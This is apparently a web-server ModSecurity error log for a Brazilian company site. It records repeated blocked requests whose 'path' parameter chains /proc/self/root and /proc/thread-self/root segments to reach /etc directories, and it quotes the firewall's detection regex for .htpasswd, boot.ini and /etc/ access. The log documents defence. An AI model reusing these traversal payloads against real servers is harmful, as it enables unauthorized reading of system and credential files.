"abp4DEzinOy1jxa1j4fp8AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:49.347378 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:42750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4Dcdf6f5d65gmYZSpugAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:01:52.742487 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:55866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4EOw_le52K8_3pV23VQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:01:56.671394 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:50606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4FOyqAr6etmhZHNqS9wAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:02:10.363887 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:57024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4Ivu8EFLIOrSqIpvb6gAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:02:37.642951 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.228.61:38344] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp4PdY0UrI5A3LftIxw4AAAAYY"]
[Wed Mar 18 07:02:42.857394 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.244.43:59906] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp4Qvu8EFLIOrSqIpvb-AAAAlQ"]
[Wed Mar 18 07:03:07.215692 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:32950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4WwkwaGbbGflqUZDomgAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:04:16.827919 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:47008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4oAkwaGbbGflqUZDo4wAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:04:21.611198 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:35068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp4pUzinOy1jxa1j4fqQwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:05:18.675395 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:40466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp43ta6ubjKNq_cu4ZuIAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:05:21.222093 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:47318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp44dY0UrI5A3LftIxxhAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:05:37.045513 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:47334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp48SmAPhZkrhU8w4lFcAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:05:38.326574 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:38658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp48tY0UrI5A3LftIxxkwAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:05:40.634368 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:56894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp49Ow_le52K8_3pV23nQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:06:22.288844 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:56906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5Hvu8EFLIOrSqIpvcRgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:06:23.577927 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:49062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5H8df6f5d65gmYZSqEQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:06:24.869606 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:49074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5INY0UrI5A3LftIxxvwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:06:39.383908 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:49088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5L9Y0UrI5A3LftIxx4gAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:06:43.924467 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:33696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5M9Y0UrI5A3LftIxx7AAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:06:45.226958 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:33712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5NdY0UrI5A3LftIxx7wAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:06:46.497803 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:33722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5NuyqAr6etmhZHNqTWAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:06:47.819739 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:33728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5N_u8EFLIOrSqIpvcSgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:07:05.026080 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:35576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5Scdf6f5d65gmYZSqQgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:07:36.597672 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:33738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp5aEzinOy1jxa1j4fqjgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:07:38.213596 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.228.61:57460] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp5agkwaGbbGflqUZDo_AAAAMk"]
